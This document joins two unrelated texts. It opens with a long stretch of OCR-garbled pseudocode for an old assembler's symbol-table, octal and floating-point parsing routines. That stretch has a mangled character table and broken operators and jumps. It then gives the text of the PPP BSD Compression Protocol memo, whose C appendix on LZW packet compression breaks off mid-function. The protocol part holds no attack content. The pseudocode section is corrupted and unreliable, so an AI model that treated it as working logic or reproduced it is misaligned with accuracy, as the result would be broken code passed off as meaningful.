Ng > 0 "error" Err_n = 1 go to exit #33 if t-2 ≠ 0 Ow = (7) #34 execute spaces() if j > 0, go to #40 S1 = symbol() if S1×3f3f3f3f3f3f = 221010101010 A = A+(8) go to #34 if S1×3f3f3f3f3f3f = 331010101010 Ow = 0 go to #34 B = find(S1) if Ng > 1 "error" Errn = 1 go to exit if r = 4 A = subset(ordinal(A)+ordinal(B)) go to #34 if r = 5 A = subset(ordinal(A)+ordinal(12_B)+1)x12 go to #34 #35 if A > (18) A = A+(Bx7)+ow go to #34 A = A+w go to #34 #40 Ng = equato(Smb,A) if Ng > 0 Errn = 2 go to exit Errn = 4 go to exit #45 if LcPage > 127 Page = Page+1 LcPage = -1 LcPage = LcPage+1 Lc = 0 go to exit #50 A = find(Smb) "define a symbolic loc." if Ng > 0 Errn = 1 go to exit "error" x = ordinal(A) if t > 4 r = t execute spaces() S = symbol() A = find(S) if r = 4: x = x+ordinal(A) if r = 5: x = x-ordinal(A) if x < 0: x = x+4096 Page = ordinal(subset(x)-(7)x5) LC_page = x(mod 128) j = 1 ... "Procedure to read ASCII tapes and convert to string" "max 80 character / string" (... rdasci() (string)St (word-set)Blank is hex ffffffff (1 character)Char0 to 63 is ["\",",""","",","","","",","",","",","",",","",","",","] cont. "g","h","i","j","k","l","m","n","o","p","q","r","s" cont. "t","u","v","w","x","y","z","[","]","\"," cont. 
cont. ... ] k = 0 (word-set)I St = Blank #1 | 91 (I) if I=(0,2,3,7), go to #2 if I = 8, go to #1 if ordinal(I) < 160, go to #1 "illegal character" k = k+1 if k > 80, go to #1 I = I*8 j = ordinal(I) St = St+Char_j go to #1 #2 rdasci() = St ...) "equate octal, procedure to assign octal equivalent to a symbol" "octal to octal" (... equato(S,V; Octeq,Symb,Itab) (word-set)S,V (real)m Ng = 0 m = search(S) if m ≥ 0 Ng = 1 go to #1 Itab = Itab+1 Octeq,Itab = V Symb,Itab = S #1 equato() = Ng ...) "octal, procedure to convert an octal symbol to an octal #" (... octal(Smb; Ng) (word-set)Smb Ng = 0 i = 0 (word-set)O = 0 j = 0 A = Smb #1 if A≥(4) A = A-(8) go to #1 #2 if A = 0, go to #3 if A ×(8-3) ≠ 0 Ng = 1 go to #3 O = O+(word-set A×3+(j)) j = j+3 A = A-(8) go to #2 #3 octal() = O ... "equate real, procedure to assign octal equivalent to a symbol" "real to octal" (...
equatr(S,V; Octeq, Symb, Itab) (word-set)S (real)m Ng = 0 m = search(S) if m ≥ 0 Ng = 1 go to #1 Itab = Itab+1 Octeq,Itab = subset(V) Symb,Itab = S #1 equatr() = Ng ...) "Procedure to search for end of statement" (... wrapup(; i,j,Strng) j = 0 #1 (word-set)A = Strng\textsubscript{24} if A\textsubscript{8} = ff, go to exit if A\textsubscript{8} = 36, go to exit if A = 755643, go to #2 if A = 435675, go to #2 Strng = Strng-(8) if A\textsubscript{8} = 5 j = 1 go to exit go to #1 #2 j = 1 Strng = Strng-(24) ...) "Procedure to skip spaces and tabs" (... spaces(;i,j,Strng) j = 0 #1 (word-set)A = Strng - 8 if A = 6 = (4), go to #2 "Spaces" if A = 43, go to #3 "semicolon" if A = 4 = (4,2,1,0), go to #2 "tab" if A = 36, go to #3 "/" if A = 8, go to #3 go to exit #2 Strng = Strng - (8) go to #1 #3 j = 1 ... "find, procedure to determine the octal equivalent" "of a symbol" (... find(S; Ng, Page, Lc, Octeq, Err, n) (word-set)S, (word-set)V (real)m if S = (6-43) = 0 V = octal(S) if Ng > 0. Errn = 6 Ng = 0 find() = V go to exit Ng = 0 if S = (40) = 39 find() = subset(128xPage + Lc - Page - 1) go to exit m = search(S) if m < 0 Ng = 1 go to exit find() = Octeq_m ... "Procedure to read a literal" (... literal(); all) Strng = Strng-(8) execute spaces() if Strngx3f3f3f3f = 202d250f Strng = Strng-(32) execute spaces() if j > 0 Errn = 6 go to #1 A = fltgpt()+{36} go to #1 if Strngx3f3f3f3f = 250b2e0d Strng = Strng-(32) execute spaces() if j > 0 Errn = 6 go to #1 A = dhlp()+{24} go to #1 m = 0 if Strngx8 = 35 m = 1 Strng = Strng-(8) if Strngx8 = 34 if m = 1: Errn = 14 Strng = Strng-(8) Smb = symbol() A = Smb-{40} if Ax6 = 28 A = octal(Smb+{8}+{4}) if Ng > 0 Errn = 6 go to #2 A = decimal(Smb) #2 if m = 1: A = subset(ordinal(12-A)+1) A = (A*12)+(12) #1 literal() = A ... "decimal to octal conversion" (... 
decimal(A; Err, n) (word-set)A C = 0 E = 1 #1 if AX6 = {4} A = A-{8} go to #1 #2 if AX6 = 0, go to #3 B = AX6 D = ordinal(B) if D > 9 Err_n = 6 go to #4 C = C+DxE F = 10E #4 A = A-{8} go to #2 #3 decimal(A;Err,n) = subset(C) ... "symbol, procedure to extract symbols from the string" (... symbol(;i,t,String) u = 0 t = 1 (word-set)Sm, Ch #1 Ch = Stringx8 if Ch > 5, go to #100 "if or 1f" if Ch = 43, go to #100 ";" if Ch = 44, go to #100 "]" if Ch = 39, go to #100 if Ch = 36, go to #100 if Ch = 38 if u = 0 u = 1 Sm = Ch Strng = Strng-(8) goto #1 go to #100 Strng = Strng-(8) if Ch = 32, go to #100 "Space" if Ch = 13, go to #2 "comma" if Ch = 33, go to #3 "equal sign" if Ch = 34, go to #4 "plus sign" if Ch = 35, go to #5 "minus sign" if Ch = 17, go to #100 "tab" if Ch = 41, go to #100 ") if Ch = 45, go to #100 "]" u = u+1 if u < 7 Sm = (Sm+(8))+Ch go to #1 #2 t = 2 "Symbol is a location" go to #100 #3 t = 3 "Symbol is to be defined" go to #100 #4 t = 4 goto #100 #5 t = 5 #100 for i = u to 5 Sm = (Sm+(8))+t(4) symbol() = Sm ... "fltgpt, procedure to extract a floating point #" execute spaces() m = 0 if Strng×8=35 "minus" Strng = Strng-(8) m = 1 p, e = 0 e = 0 q = 0 (word-set)A, B #1 B = Strng×8 C = ordinal(B) if C > 9 if C = 57 if p > 0 Err_n = 12 "2 period" go to #10 p = .10 go to #3 #2 if C = 30, go to #10 "spaces" if C = 64, go to #9 ")" if C = 69, go to #9 "]" if C = 63, go to #10 "}". if C = 54, go to #10 "/". 
if C = 255, go to #10 "ff" if (C(mod 64)) = 14, go to #5 "e" Err_n = 6 "illegal characters" go to #10 #2 if p = 0 e = e×10+C go to #3 #3 Strng = Strng-(8) go to #1 #5 Strng = Strng-(8) execute spaces() if j > 0 Errn = 3 go to #10 if Strngx8=35 e = 1 Strng = Strng-(8) if Strngx8=34 if e > 0 Errn = 14 "follows-" Strng = Strng-(8) #6 B = Strngx8 C = ordinal(B) if C > 9, go to #10 q = qx10+c Strng = Strng-(8) go to #5 #9 Strng = Strng-(8) #10 if e > 0: q = -q o = ox(10)q A = word(o)x43 (REAL) x = [word(o)x(47-44)-(17)]+[word(o)x(47)-(4)]+(44) x = 16(x-1) #12 if (43-27)xA 0 A = A-(1) x = x+1 go to #12 A = A-(4) if x < 0: x = x+4096 if m > 0: A = subset(ordinal(24-A)+1) fltgpt() = (A+(subset(x)+(24))x36 ...)} "dblp, procedure to extract a double precision integer" (... dblp(Strng, Err, n, j) execute spaces() if j > 0 Errn = 3 go to exit p = 0 m = 0 if Strngx8 = 35 m = 1 Strng = Strng(8) if Strngx8 = 34 if m > 1: Errn = 14 Strng = Strng(8) #4 (word-set)A = Strngx8 b = ordinal(A) if b > 9 if b = 64, go to #9 if b = 69, go to #9 p = px10+b Strng = Strng(8) go to #i #9 Strng = Strng(8) #10 A = subset(b) if m > 0: A = subset(ordinal(24-A)+1) dblp() = Ax24 ... ) "search, procedure to locate a predefined symbol" (... search(S; Symb, Itab) (word-set)S for m = 0 to Itab if (S=Symb_m)x3f3f3f3f3f3f3f3=0 go to #i m = -1 #1 search() = m ... )
PPP BSD Compression Protocol

Status of This Memo

This memo provides information for the Internet community. This memo does not specify an Internet standard of any kind. Distribution of this memo is unlimited.

Abstract

The Point-to-Point Protocol (PPP) [1] provides a standard method for transporting multi-protocol datagrams over point-to-point links. This document describes the use of the Unix Compress compression protocol for compressing PPP encapsulated packets.

Table of Contents

1. Introduction ................................................. 1
   1.1 Licensing ................................................ 2
2. BSD Compress Packets ......................................... 2
   2.1 Packet Format ............................................ 5
3. Configuration Option Format .................................. 6
APPENDICES ...................................................... 7
A. BSD Compress Algorithm ....................................... 7
SECURITY CONSIDERATIONS ......................................... 24
REFERENCES ...................................................... 24
ACKNOWLEDGEMENTS ................................................ 24
CHAIR'S ADDRESS ................................................. 25
AUTHOR'S ADDRESS ................................................ 25

1. Introduction

UNIX compress as embodied in the freely and widely distributed BSD source has the following features:

- dynamic table clearing when compression becomes less effective.
- automatic turning off of compression when the overall result is not smaller than the input.
- dynamic choice of code width within predetermined limits.
- heavily used for many years in networks, on modem and other point-to-point links to transfer netnews.
- the effective code width requires less than 64 KBytes of memory on both sender and receiver.

1.1. Licensing

BSD Unix compress command source is widely and freely available, with no additional license for many computer vendors.
The included source code is based on the BSD compress command source and carries only the copyright of The Regents of the University of California. Use the code entirely at your own risk. It has no warranties or indemnifications of any sort. Note that there are patents on LZW.

2. BSD Compress Packets

Before any BSD Compress packets may be communicated, PPP must reach the Network-Layer Protocol phase, and the CCP Control Protocol must reach the Opened state.

Exactly one BSD Compress datagram is encapsulated in the PPP Information field, where the PPP Protocol field contains 0xFD or 0xFB. 0xFD is used when the PPP multilink protocol is not used or "above" multilink. 0xFB is used "below" multilink, to compress independently on individual links of a multilink bundle.

The maximum length of the BSD Compress datagram transmitted over a PPP link is the same as the maximum length of the Information field of a PPP encapsulated packet.

Only packets with PPP Protocol numbers in the range 0x0000 to 0x3FFF and neither 0xFD nor 0xFB are compressed. Other PPP packets are always sent uncompressed. Control packets are infrequent and should not be compressed for robustness.

Padding

BSD Compress packets require the previous negotiation of the Self-Describing-Padding Configuration Option [3] if padding is added to packets. If no padding is added, then Self-Describing-Padding is not required.

Reliability and Sequencing

BSD Compress requires the packets to be delivered in sequence. It relies on Reset-Request and Reset-Ack CCP packets or on renegotiation of the Compression Control Protocol [2] to indicate loss of synchronization between the transmitter and receiver.

The HDLC FCS detects corrupted packets and the normal mechanisms discard them. Missing or out of order packets are detected by the sequence number in each packet. The packet sequence number ought to be checked before decoding the packet.
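The receiver-side sequence check just described can be sketched as a small state machine. This is an illustrative sketch, not code from the protocol or the appendix; the class and method names are invented, and the actual decompression, dictionary handling, and CCP packet exchange are stubbed out:

```python
# Illustrative receiver-side sequence handling for BSD Compress:
# decode in-order packets, request a reset on a sequence gap, and
# discard everything until the Reset-Ack arrives.

class BsdReceiver:
    def __init__(self):
        self.expected_seq = 0      # sequence restarts at 0 after a clear
        self.discarding = False    # True between an error and Reset-Ack

    def on_packet(self, seq):
        """Return the action for a compressed packet with this sequence
        number: 'decode', 'reset-request', or 'discard'."""
        if self.discarding:
            return "discard"       # drop all packets until Reset-Ack
        if seq != self.expected_seq:
            self.discarding = True # lost or reordered packet detected
            return "reset-request"
        self.expected_seq = (self.expected_seq + 1) % 65536
        return "decode"

    def on_reset_ack(self):
        # clear the dictionary (not shown) and restart the sequence space
        self.expected_seq = 0
        self.discarding = False

rx = BsdReceiver()
print(rx.on_packet(0))   # 'decode'
print(rx.on_packet(1))   # 'decode'
print(rx.on_packet(3))   # 'reset-request'  (packet 2 was lost)
print(rx.on_packet(4))   # 'discard' until the Reset-Ack arrives
rx.on_reset_ack()
print(rx.on_packet(0))   # 'decode'
```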
Instead of transmitting a Reset-Request packet when detecting a decompression error, the receiver MAY momentarily force CCP to drop out of the Opened state by transmitting a new CCP Configure-Request. This method is more expensive than using Reset-Requests.

When the receiver first encounters an unexpected sequence number it SHOULD send a Reset-Request CCP packet as defined in the Compression Control Protocol. When the transmitter sends the Reset-Ack or when the receiver receives a Reset-Ack, they must reset the sequence number to zero, clear the compression dictionary, and resume sending and receiving compressed packets.

The receiver MUST discard all compressed packets after detecting an error and until it receives a Reset-Ack. This strategy can be thought of as abandoning the transmission of one "file" and starting the transmission of a new "file."

The transmitter must clear its compression dictionary and respond with a Reset-Ack each time it receives a Reset-Request, because it cannot know if previous Reset-Acks reached the receiver. The receiver MUST clear its compression dictionary each time it receives a Reset-Ack, because the transmitter will have cleared its compression dictionary.

When the link is busy, one decompression error is usually followed by several more before the Reset-Ack can be received. It is undesirable to transmit Reset-Requests more frequently than the round-trip-time of the link, because redundant Reset-Requests cause unnecessary compression dictionary clearing. The receiver MAY transmit an additional Reset-Request each time it receives a compressed or uncompressed packet until it finally receives a Reset-Ack, but the receiver ought not transmit another Reset-Request until the Reset-Ack for the previous one is late. The receiver MUST transmit enough Reset-Request packets to ensure that the transmitter receives at least one.
For example, the receiver might choose to not transmit another Reset-Request until after one second (or, of course, until a Reset-Ack has been received and decompression resumed).

Data Expansion

When significant data expansion is detected, the PPP packet MUST be sent without compression. Packets that would expand by fewer than 3 bytes SHOULD be sent without compression, but MAY be sent compressed provided the result does not exceed the MTU of the link. This makes moot standards document exegeses about exactly which bytes, such as the Protocol fields, count toward expansion.

When a packet is received with PPP Protocol numbers in the range 0x0000 to 0x3FFF (except, of course, 0xFD and 0xFB), it is assumed that the packet would have caused expansion. The packet is locally compressed to update the compression history.

Sending incompressible packets in their native encapsulation avoids maximum transmission unit complications. If uncompressed packets could be larger than their native form, then it would be necessary for the upper layers of an implementation to treat the PPP link as if it had a smaller MTU, to ensure that compressed incompressible packets are never larger than the negotiated PPP MTU.

Using native encapsulation for incompressible packets complicates the implementation. The transmitter and the receiver must start putting information into the compression dictionary starting with the same packets, without relying upon seeing a compressed packet for synchronization. The first few packets after clearing the dictionary are usually incompressible, and so are likely to be sent in their native encapsulation, just like packets before compression is turned on. If CCP or LCP packets are handled separately from Network-Layer packets (e.g.
a "daemon" for control packets and "kernel code" for data packets), care must be taken to ensure that the transmitter synchronizes clearing the dictionary with the transmission of the Configure-Ack or Reset-Ack that starts compression, and the receiver must similarly ensure that its dictionary is cleared before it processes the next packet.

A difficulty caused by sending data that would expand uncompressed is that the receiver must adaptively clear its dictionary at precisely the same times as the sender. In the classic BSD compression code, the dictionary clearing is signaled by the reserved code 256. Because data that would expand is sent without compression, there is no reliable way for the sender to signal explicitly when it has cleared its dictionary. This difficulty is resolved by specifying the parameters that control the dictionary clearing, and having both sender and receiver clear their dictionaries at the same times.

2.1. Packet Format

A summary of the BSD Compress packet format is shown below. The fields are transmitted from left to right.

```
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|         PPP Protocol          |           Sequence            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|        Data ...
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
```

PPP Protocol

   The PPP Protocol field is described in the Point-to-Point Protocol Encapsulation [1]. When the BSD Compress compression protocol is successfully negotiated by the PPP Compression Control Protocol [2], the value of the Protocol field is 0xFD or 0xFB. This value MAY be compressed when Protocol-Field-Compression is negotiated.

Sequence

   The sequence number is sent most significant octet first. It starts at 0 when the dictionary is cleared, and is incremented by 1 after each packet, including uncompressed packets. The sequence number after 65535 is 0. In other words, the sequence number "wraps" in the usual way.
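The sequence-number arithmetic can be sketched concretely. The helper below is illustrative, not code from this memo; a 16-bit unsigned counter gives exactly the required wrap from 65535 back to 0.

```c
#include <stdint.h>

/* Illustrative helper: the 16-bit sequence number starts at 0 when the
 * dictionary is cleared, increments once per packet (compressed or
 * uncompressed), and wraps from 65535 back to 0 by ordinary unsigned
 * arithmetic. */
uint16_t next_seqno(uint16_t seqno)
{
    return (uint16_t)(seqno + 1);
}
```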
The sequence number ensures that lost or out-of-order packets do not cause the compression databases of the peers to become unsynchronized. When an unexpected sequence number is encountered, the dictionaries must be resynchronized with a CCP Reset-Request or Configure-Request. The packet sequence number can be checked before a compressed packet is decoded.

Data

   The compressed PPP encapsulated packet, consisting of the Protocol and Data fields of the original, uncompressed packet, follows. Protocol field compression MUST be applied to the Protocol field of the original packet before the sequence number is computed or the packet is compressed, regardless of whether PPP Protocol-Field-Compression has been negotiated. Thus, if the original protocol number was less than 0x100, it must be compressed to a single byte. The format of the compressed data is more precisely described by the example code in the "BSD Compress Algorithm" appendix.

3. Configuration Option Format

Description

   The CCP BSD Compress Configuration Option negotiates the use of BSD Compress on the link. By default, or upon ultimate disagreement, no compression is used.

   A summary of the BSD Compress Configuration Option format is shown below. The fields are transmitted from left to right.

```
 0                   1                   2
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|     Type      |    Length     | Vers|  Dict   |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
```

Type

   21 or 0x15 for BSD Compress.

Length

   3

Vers

   Must be the binary number 001.

Dict

   The size in bits of the largest code used. It can range from 9 to 16. A common choice is 12. The code included below can support code sizes from 9 to 15.

   It is convenient to treat the byte containing the Vers and Dict fields as a single field with legal values ranging from 0x29 to 0x30. Note that the peer receiving compressed data must use the same code size as the peer sending data.
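The legal range 0x29 to 0x30 for the combined Vers+Dict byte follows directly from packing Vers (binary 001) into the top 3 bits and Dict (9 to 16) into the low 5 bits. The helper below is illustrative only; its name and out-of-range convention are assumptions, not part of the option format.

```c
/* Illustrative: pack Vers (binary 001, top 3 bits) and Dict (the LZW
 * code size in bits, 9..16, low 5 bits) into the single option byte.
 * Returns 0 for an out-of-range code size. */
unsigned bsd_vers_dict_byte(unsigned dict_bits)
{
    if (dict_bits < 9 || dict_bits > 16)
        return 0;                   /* not a legal Dict value */
    return (1u << 5) | dict_bits;   /* yields 0x29 .. 0x30 */
}
```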
It is not practical for the receiver to use a larger dictionary or code size than the transmitter, because both dictionaries must be cleared at the same time, even when the data is not compressible and only uncompressed packets are being sent, and so the receiver cannot rely on receiving LZW "CLEAR" codes. When a received Configure-Request specifies a smaller dictionary than the local preference, it is often best to accept it instead of using a Configure-Nak to ask the peer to specify a larger dictionary.

A. BSD Compress Algorithm

This code is the core of a commercial workstation implementation. It was derived by transliterating the 4.*BSD compress command. It is unlikely to be of direct use in any system that does not have the same mixture of mbufs and STREAMS buffers. It may need to be retuned for CPUs other than RISCs with many registers and certain addressing modes. However, the code is the most accurate and unambiguous way of defining the changes to the BSD compress source required to apply it to a stream instead of a file. Note that it assumes a "short" contains 16 bits and an "int" contains at least 32 bits. Where it would matter if more than 32 bits were in an "int" or "long," __uint32_t is used instead.

```c
/* Because this code is derived from the 4.3BSD compress source:
 *
 * Copyright (c) 1985, 1986 The Regents of the University of California.
 * All rights reserved.
 *
 * This code is derived from software contributed to Berkeley by
 * James A. Woods, derived from original work by Spencer Thomas
 * and Joseph Orost.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in
 *    the documentation and/or other materials provided with the
 *    distribution.
 * 3. All advertising materials mentioning features or use of this
 *    software must display the following acknowledgement:
 *    ...
 */

/* PPP "BSD compress" compression
 *
 * The differences between this compression and the classic BSD LZW
 * source are obvious from the requirement that the classic code worked
 * with files while this handles arbitrarily long streams that
 * are broken into packets.  They are:
 *
 *      When the code size expands, a block of junk is not emitted by
 *      the compressor and not expected by the decompressor.
 *
 *      New codes are not necessarily assigned every time an old
 *      code is output by the compressor.  This is because a packet
 *      end forces a code to be emitted, but does not imply that a
 *      new sequence has been seen.
 *
 *      The compression ratio is checked at the first end of a packet
 *      after the appropriate gap.  Besides simplifying and speeding
 *      things up, this makes it more likely that the transmitter
 *      and receiver will agree when the dictionary is cleared when
 *      compression is not going well.
 */

struct bsd_db {
    int     totlen;             /* length of this structure */
    u_int   hsize;              /* size of the hash table */
    u_char  hshift;             /* used in hash function */
    u_char  n_bits;             /* current bits/code */
    u_char  debug;
    u_char  unit;
    u_short mru;
    u_short seqno;              /* # of last byte of packet */
    u_int   maxmaxcode;         /* largest valid code */
    u_int   max_ent;            /* largest code in use */
    u_int   in_count;           /* uncompressed bytes */
    u_int   bytes_out;          /* compressed bytes */
    u_int   ratio;              /* recent compression ratio */
    u_int   checkpoint;         /* when to next check ratio */
    int     clear_count;        /* times dictionary cleared */
    int     incomp_count;       /* incompressible packets */
    int     decomp_count;       /* packets decompressed */
    int     overshoot;          /* excess decompression buf */
    int     undershoot;         /* insufficient decomp. buf */
    u_short *lens;              /* array of lengths of codes */
    struct bsd_dict {
        union {                 /* hash value */
            __uint32_t fcode;
            struct {
#ifdef BSD_LITTLE_ENDIAN
                u_short prefix; /* preceding code */
                u_char  suffix; /* last character of new code */
                u_char  pad;
#else
                u_char  pad;
                u_char  suffix;
                u_short prefix;
#endif
            } hs;
        } f;
        u_short codem1;         /* output of hash table - 1 */
        u_short cptr;           /* map code to hash table entry */
    } dict[1];
};

/*
 * The next two codes should not be changed lightly, as they must not
 * lie within the contiguous general code space.
 */
#define CLEAR           256     /* table clear output code */
#define FIRST           257     /* first free entry */
#define LAST            255

#define BSD_INIT_BITS   MIN_BSD_BITS
#define MAXCODE(b)      ((1 << (b)) - 1)
#define BADCODEM1       MAXCODE(MAX_BSD_BITS)

#define BSD_HASH(prefix,suffix,hshift) ((((__uint32_t)(suffix)) << (hshift)) \
                                        ^ ((__uint32_t)(prefix)))
#define BSD_KEY(prefix,suffix)  ((((__uint32_t)(suffix)) << 16) \
                                 + ((__uint32_t)(prefix)))

#define CHECK_GAP       10000   /* ratio check interval */

#define RATIO_SCALE_LOG 8
#define RATIO_SCALE     (1<<RATIO_SCALE_LOG)
#define RATIO_MAX       (0x7fffffff>>RATIO_SCALE_LOG)

/* clear the dictionary */
static void
pf_bsd_clear(struct bsd_db *db)
{
    db->clear_count++;
    db->max_ent = FIRST-1;
    db->n_bits = BSD_INIT_BITS;
    db->ratio = 0;
    db->bytes_out = 0;
    db->in_count = 0;
    db->incomp_count = 0;
    db->decomp_count = 0;
    db->overshoot = 0;
    db->undershoot = 0;
    db->checkpoint = CHECK_GAP;
}

/* If the dictionary is full, then see if it is time to reset it.
 *
 * Compute the compression ratio using fixed-point arithmetic
 * with 8 fractional bits.
 * Since we have an infinite stream instead of a single file,
 * watch only the local compression ratio.
 *
 * Since both peers must reset the dictionary at the same time even in
 * the absence of CLEAR codes (while packets are incompressible), they
 * must compute the same ratio.
 */
static int                          /* 1=dictionary cleared */
pf_bsd_check(struct bsd_db *db)
{
    register u_int new_ratio;

    if (db->in_count >= db->checkpoint) {
        /* age the ratio by limiting the size of the counts */
        if (db->in_count >= RATIO_MAX
            || db->bytes_out >= RATIO_MAX) {
            db->in_count -= db->in_count/4;
            db->bytes_out -= db->bytes_out/4;
        }

        db->checkpoint = db->in_count + CHECK_GAP;

        if (db->max_ent >= db->maxmaxcode) {
            /* Reset the dictionary only if the ratio is worse,
             * or if it looks as if it has been poisoned by
             * incompressible data.
             *
             * This does not overflow, because
             *  db->in_count <= RATIO_MAX.
             */
            new_ratio = db->in_count << RATIO_SCALE_LOG;
            if (db->bytes_out != 0)
                new_ratio /= db->bytes_out;

            if (new_ratio < db->ratio || new_ratio < 1*RATIO_SCALE) {
                pf_bsd_clear(db);
                return 1;
            }
            db->ratio = new_ratio;
        }
    }
    return 0;
}

/* Initialize the database. */
struct bsd_db*
pf_bsd_init(struct bsd_db *db,      /* initialize this database */
            int unit,               /* for debugging */
            int bits,               /* size of LZW code word */
            int mru)                /* MRU for input, 0 for output */
{
    register int i;
    register u_short *lens;
    register u_int newlen, hsize, hshift, maxmaxcode;

    switch (bits) {
    case 9:                         /* needs 82152 for both comp & */
    case 10:                        /* needs 84144   decomp */
    case 11:                        /* needs 88240 */
    case 12:                        /* needs 96432 */
        hsize = 5003;
        hshift = 4;
        break;
    case 13:                        /* needs 176784 */
        hsize = 9001;
        hshift = 5;
        break;
    case 14:                        /* needs 353744 */
        hsize = 18013;
        hshift = 6;
        break;
    case 15:                        /* needs 691440 */
        hsize = 35023;
        hshift = 7;
        break;
    case 16:                        /* needs 1366160--far too much */
        hsize = 69001;
        hshift = 8;
        break;
    default:
        if (db) {
            if (db->lens)
                kern_free(db->lens);
            kern_free(db);
        }
        return 0;
    }

    maxmaxcode = MAXCODE(bits);
    newlen = sizeof(*db) + (hsize-1)*(sizeof(db->dict[0]));
    lens = 0;
    if (db) {
        lens = db->lens;
        if (db->totlen != newlen) {
            if (lens)
                kern_free(lens);
            kern_free(db);
            db = 0;
        }
    }
    if (!db) {
        db = (struct bsd_db*)kern_malloc(newlen);
        if (!db)
            return 0;
        if (mru == 0) {
            lens = 0;
        } else {
            lens = (u_short*)kern_malloc((maxmaxcode+1) * sizeof(*lens));
            if (!lens) {
                kern_free(db);
                return 0;
            }
            i = LAST+1;
            while (i != 0)
                lens[--i] = 1;
        }
        i = hsize;
        while (i != 0) {
            db->dict[--i].codem1 = BADCODEM1;
            db->dict[i].cptr = 0;
        }
    }

    bzero(db, sizeof(*db) - sizeof(db->dict));
    db->lens = lens;
    db->unit = unit;
    db->mru = mru;
    db->hsize = hsize;
    db->hshift = hshift;
    db->maxmaxcode = maxmaxcode;
    db->clear_count = -1;
    pf_bsd_clear(db);
    return db;
}

/* compress a packet
 * Assume the protocol is known to be >= 0x21 and < 0xff.
 * One change from the BSD compress command is that when the code size
 * expands, we do not output a bunch of padding.
 */
int                                 /* new slen */
pf_bsd_comp(struct bsd_db *db,
            u_char *cp_buf,         /* compress into here */
            int proto,              /* this original PPP protocol */
            struct mbuf *m,         /* from here */
            int slen)
{
    register int hshift = db->hshift;
    register u_int max_ent = db->max_ent;
    register u_int n_bits = db->n_bits;
    register u_int bitno = 32;
    register __uint32_t accum = 0;
    register struct bsd_dict *dictp;
    register __uint32_t fcode;
    register u_char c;
    register int hval, disp, ent;
    register u_char *rptr, *wptr;
    struct mbuf *n;

#define OUTPUT(ent) {                   \
    bitno -= n_bits;                    \
    accum |= ((ent) << bitno);          \
    do {                                \
        *wptr++ = accum >> 24;          \
        accum <<= 8;                    \
        bitno += 8;                     \
    } while (bitno <= 24);              \
}

    /* start with the protocol byte */
    ent = proto;
    db->in_count++;

    /* install sequence number */
    cp_buf[0] = db->seqno >> 8;
    cp_buf[1] = db->seqno;
    db->seqno++;
    wptr = &cp_buf[2];

    slen = m->m_len;
    db->in_count += slen;
    rptr = mtod(m, u_char*);
    n = m->m_next;

    for (;;) {
        if (slen == 0) {
            if (!n)
                break;
            slen = n->m_len;
            rptr = mtod(n, u_char*);
            n = n->m_next;
            if (!slen)
                continue;       /* handle 0-length buffers */
            db->in_count += slen;
        }
        slen--;
        c = *rptr++;
        fcode = BSD_KEY(ent, c);
        hval = BSD_HASH(ent, c, hshift);
        dictp = &db->dict[hval];

        /* Validate and then check the entry. */
        if (dictp->codem1 >= max_ent)
            goto nomatch;
        if (dictp->f.fcode == fcode) {
            ent = dictp->codem1+1;
            continue;           /* found (prefix,suffix) */
        }

        /* continue probing until a match or an invalid entry */
        disp = (hval == 0) ? 1 : hval;
        do {
            hval += disp;
            if (hval >= db->hsize)
                hval -= db->hsize;
            dictp = &db->dict[hval];
            if (dictp->codem1 >= max_ent)
                goto nomatch;
        } while (dictp->f.fcode != fcode);
        ent = dictp->codem1+1;  /* found (prefix,suffix) */
        continue;

    nomatch:
        OUTPUT(ent);            /* output the prefix */

        /* code -> hashtable */
        if (max_ent < db->maxmaxcode) {
            struct bsd_dict *dictp2;

            /* expand code size if needed */
            if (max_ent >= MAXCODE(n_bits))
                db->n_bits = ++n_bits;

            /* Invalidate old hash table entry using this code,
             * and then take it over.
             */
            dictp2 = &db->dict[max_ent+1];
            if (db->dict[dictp2->cptr].codem1 == max_ent)
                db->dict[dictp2->cptr].codem1 = BADCODEM1;
            dictp2->cptr = hval;
            dictp->codem1 = max_ent;
            dictp->f.fcode = fcode;
            db->max_ent = ++max_ent;
        }
        ent = c;
    }

    OUTPUT(ent);                /* output the last code */
    db->bytes_out += (wptr - &cp_buf[2]     /* count complete bytes */
                      + (32-bitno+7)/8);
    if (pf_bsd_check(db))
        OUTPUT(CLEAR);          /* do not count the CLEAR */

    /* Pad dribble bits of last code with ones.
     * Do not emit a completely useless byte of ones.
     */
    if (bitno != 32)
        *wptr++ = (accum | (0xff << (bitno-8))) >> 24;

    /* Increase code size if we would have without the packet
     * boundary and as the decompressor will.
     */
    if (max_ent >= MAXCODE(n_bits) && max_ent < db->maxmaxcode)
        db->n_bits++;

    return (wptr - cp_buf);
#undef OUTPUT
}

/* Update the "BSD Compress" dictionary on the receiver for
 * incompressible data by pretending to compress the incoming data.
 */
void
pf_bsd_incomp(struct bsd_db *db,
              mblk_t *dmsg,
              u_int ent)            /* start with protocol byte */
{
    register u_int hshift = db->hshift;
    register u_int max_ent = db->max_ent;
    register u_int n_bits = db->n_bits;
    register struct bsd_dict *dictp;
    register __uint32_t fcode;
    register u_char c;
    register int hval, disp;
    register int slen;
    register u_int bitno = 7;
    register u_char *rptr;

    db->incomp_count++;
    db->in_count++;                 /* count protocol as 1 byte */
    db->seqno++;

    rptr = dmsg->b_rptr + PPP_BUF_HEAD_INFO;
    for (;;) {
        slen = dmsg->b_wptr - rptr;
        if (slen == 0) {
            dmsg = dmsg->b_cont;
            if (!dmsg)
                break;
            rptr = dmsg->b_rptr;
            continue;               /* skip zero-length buffers */
        }
        db->in_count += slen;

        do {
            c = *rptr++;
            fcode = BSD_KEY(ent, c);
            hval = BSD_HASH(ent, c, hshift);
